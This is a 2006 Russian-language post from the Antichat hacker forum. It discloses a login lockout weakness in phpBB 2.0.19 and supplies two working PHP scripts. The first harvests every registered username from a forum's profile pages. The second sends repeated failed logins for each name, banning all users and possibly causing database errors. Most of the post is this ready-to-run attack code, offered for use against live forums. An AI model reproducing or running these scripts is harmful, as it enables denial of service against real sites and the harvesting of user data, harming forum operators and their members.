ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость в phpbb 2.0.19 возможно даже более ранние версии
  #1  
Старый 11.02.2006, 22:32
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию Уязвимость в phpbb 2.0.19 возможно даже более ранние версии

Уязвимость позволяет забанить всех пользователей на форуме, что в свою очередь может вызвать сбой в работе базы данных.
Суть ошибки состоит в том, что при авторизации пользователя можно вести неверные данные x-раз, что приведет к бану соответствующего пользователя форума на определенное время указное в админке форума и пользователь при авторизации увидит следующее - (Максимальное количество попыток (X) войти на форум было исчерпано. Вы не сможете войти на форум в последующие Y минут.) или произойдет ошибка в базе данных (phpBB : Critical Error Could not connect to the database).

Эксплоит (написан на php)

Собирает в файл Ники всех пользователей форума.
---------------
Автор: k1b0rg
---------------
Код:
<?
$host="Сайт";
$papka="Папка с форумом";
$port=80;
$number_users=2050;
$start=1;
set_time_limit(0);
$file="user.txt";
$file=fopen($file,*w*);
for($i=$start;$i<=$number_users;$i++)
{$request="GET http://$host/$papka/profile.php?mode=viewprofile&u=$i HTTP/1.0\r\n";
$request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, *\/*\r\n";
$request.="Accept-Language: ru\r\n";
$request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$request.="Host: $host\r\n";
$request.="Proxy-Connection: Keep-Alive\r\n\r\n";
$sock=fsockopen("$host",$port,$errno,$errstr);
fputs($sock,$request);
while(!feof($sock))
{$str=fgets($sock);
if(preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return))
{if(trim($return[1])!=**)
{fputs($file,"$return[1]\n");
}}}}
fclose($file);
fclose($sock);
?>
Скрипт для сборки всех зарегенных юзеров универсальный т.е. подходит под любой форум. Но только если:
1. Если не зарегеным пользователям можно смотреть профайл других (иначе придеться еще посылать строку с вашими куками)
2. Правильно настроен preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)<\/th>/i",$str,$return))
в некоторых форумах придеться немного изменить, если допустим имя юзверя находиться в титле <title>Юзер - Lamer</title>
то переписываем preg_match как
preg_match("/<title>Юзер - (.*)<\/title>/i",$str,$return))
Сам сплоит
---------------
Автор: ASSCOL
---------------
Код:
<?
set_time_limit(0);
$host="Сайт";
$papka="Папка с форумом";
$file=fopen("user.txt",*r*);
while(!feof($file))
{
$str=fgets($file);
$str=trim($str);
for($i=0; $i<=5; $i++)
{
$request="POST http://$host/$papka/login.php?sid=f1bed4ab383a8521a612d6896e0ee21e HTTP/1.0\r\n";
$request.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, *\/*\r\n";
$request.="Referer: http://$host/$papka/login.php\r\n";
$request.="Accept-Language: ru\r\n";
$request.="Content-Type: application/x-www-form-urlencoded\r\n";
$request.="Proxy-Connection: Keep-Alive\r\n";
$request.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2)\r\n";
$request.="Host: $host\r\n";
$request.="Content-Length: 73\r\n";
$request.="Pragma: no-cache\r\n";
$request.="Cookie: b=b; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=f1bed4ab383a8521a612d6896e0ee21e; hotlog=1\r\n";
$request.="\r\n";
$request.="username=$str&password=5555&redirect=&login=%C2%F5%EE%E4\r\n\r\n";
$fp=fsockopen("$host",80,$errstr,$errno);
fputs($fp,$request);
fclose($fp); 
}
}
?>
--------------------------------
Нашел уязвимость ASSCOL.
--------------------------------
Статья взята с сайта http://comp-info.ru
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Форумы 6 26.10.2006 21:30
Скрипт Perl: Узнавалка версии phpBB DetMyl PHP, PERL, MySQL, JavaScript 4 14.02.2006 00:48
Уязвимости в форумах phpbb до версии 2.0.13 *Van* Форумы 3 27.11.2005 00:43
XSS usercp_register.php phpBB 2.0.13 и более ранние версии XJIOP Форумы 14 16.04.2005 17:46



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ